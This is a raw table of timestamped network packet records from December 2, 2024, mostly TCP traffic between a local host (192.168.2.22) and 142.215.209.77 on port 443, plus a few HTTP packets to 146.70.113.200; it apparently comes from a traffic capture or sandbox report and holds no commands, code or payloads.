                                                  Dec 2, 2024 07:24:59.780025959 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.780034065 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.788156033 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.788219929 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.788228035 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.796288967 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.796396017 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.796402931 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.807257891 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.807332039 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.807338953 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.815256119 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.815301895 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.815330029 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.815336943 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.819430113 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.895061016 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.895076036 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.895131111 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.895138025 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.902358055 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.902420044 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.902426004 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.908608913 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.908731937 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.908737898 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.914678097 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.914737940 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.914743900 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.922175884 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.922267914 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.922276020 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.927742958 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.927784920 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.927829027 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.927836895 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.931433916 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.933222055 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.933233023 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.933307886 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.933314085 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.940237999 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.940345049 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.940351963 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.945444107 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.945534945 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.945544004 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.948621035 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.948703051 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.948713064 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.951586962 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.951657057 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.951664925 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.955318928 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.955426931 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.976511955 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.976528883 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.976538897 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.976593018 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.976643085 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.976643085 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.976655006 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.976664066 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.976722956 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.977452993 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.977525949 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.097599983 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.097717047 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.097737074 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.100368977 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.100452900 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.100461006 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.103385925 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.103451014 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.103457928 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.107481956 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.107566118 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.107573032 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.110529900 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.110594034 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.110600948 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.112903118 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.113008022 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.113015890 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.116528034 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.116607904 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.116616964 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.119599104 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.119669914 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.119676113 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.122440100 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.122529984 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.122536898 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.125696898 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.125766993 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.125773907 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.129394054 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.129443884 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.129453897 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.132329941 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.132427931 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.132436037 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.135263920 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.135337114 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.135344982 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.138884068 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.138969898 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.138981104 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.141866922 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.141966105 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.141973972 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.144825935 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.144939899 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.144948006 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.165021896 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.314362049 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.314439058 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.314450026 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.317276001 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.317338943 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.317348003 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.321022034 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.321079969 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.321086884 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.323949099 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.324045897 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.324053049 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.326731920 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.326809883 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.326817036 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.330574036 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.330672979 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.330678940 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.333408117 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.333468914 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.333475113 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.336276054 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.336375952 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.336381912 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.339967966 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.340029955 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.340035915 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.343384027 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.343456984 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.343462944 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.346292019 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.346446991 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.346453905 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.349064112 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.349123001 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.349128962 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.352830887 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.352914095 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.352921963 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.355751991 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.355803967 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.355811119 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.358620882 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.358670950 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.358678102 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.513905048 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.514040947 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.514070034 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.515855074 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.515863895 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.515923023 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.515933037 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.518810034 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.518817902 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.518881083 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.518889904 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.519697905 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.523055077 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.523063898 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.523137093 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.523144007 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.525902033 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.525962114 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.525969982 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.526932955 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.528529882 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.528584003 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.528589964 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.532067060 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.532125950 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.532135010 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.534981966 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.555516958 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.555593967 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.555600882 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.558482885 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.558546066 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.558552980 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.562120914 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.562192917 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.562201023 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.565107107 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.565196037 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.565203905 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.567960024 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.568039894 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.568047047 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.657408953 CET8049171146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:01.657543898 CET4917180192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:01.657691002 CET8049168146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:01.657743931 CET4916880192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:01.657834053 CET4917180192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:01.722124100 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.722315073 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.722342014 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.725016117 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.725024939 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.725058079 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.725140095 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.725151062 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.725442886 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.727924109 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.727931976 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.727962971 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.727997065 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.727997065 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.731570005 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.731576920 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.731637955 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.731645107 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.734591007 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.734622002 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.734666109 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.734673023 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.738214016 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.738245010 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.738289118 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.738296986 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.738348961 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.741035938 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.741044044 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.741117001 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.741126060 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.744009018 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.744069099 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.744076014 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.747726917 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.747781038 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.747788906 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.750588894 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.750649929 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.750658989 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.753933907 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.754060984 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.754074097 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.756850004 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.756932020 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.756939888 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.760544062 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.760637999 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.760647058 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.763416052 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.763511896 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.763519049 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.766527891 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.766618013 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.766623974 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.770112991 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.770209074 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.770219088 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.777647018 CET8049171146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:01.923331976 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.923487902 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.923511982 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.926249027 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.926255941 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.926282883 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.926369905 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.926384926 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.929176092 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.929912090 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.929919004 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.929941893 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.929987907 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.929987907 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.932770014 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.932779074 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.932852030 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.932867050 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.935776949 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.935785055 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.935846090 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.935853004 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.939474106 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.939512968 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.939548969 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.939558983 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.941175938 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.942390919 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.942399025 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.942511082 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.942519903 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.945244074 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.945317984 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.945327044 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.948940039 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.949052095 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.949060917 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.952246904 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.952310085 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.952317953 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.955099106 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.955199957 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.955209970 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.958375931 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.958448887 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.958457947 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.961772919 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.961849928 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.961858988 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.964754105 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.964848995 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.964859962 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.967592001 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.967664003 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.967674017 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.971297026 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.971374989 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.971384048 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.126358986 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.126488924 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.126513958 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.129270077 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.129276991 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.129309893 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.129374027 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.129390955 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.129525900 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.132930040 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.132941008 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.132973909 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.133024931 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.133024931 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.135149956 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.135160923 CET44349167142.215.209.77192.168.2.22
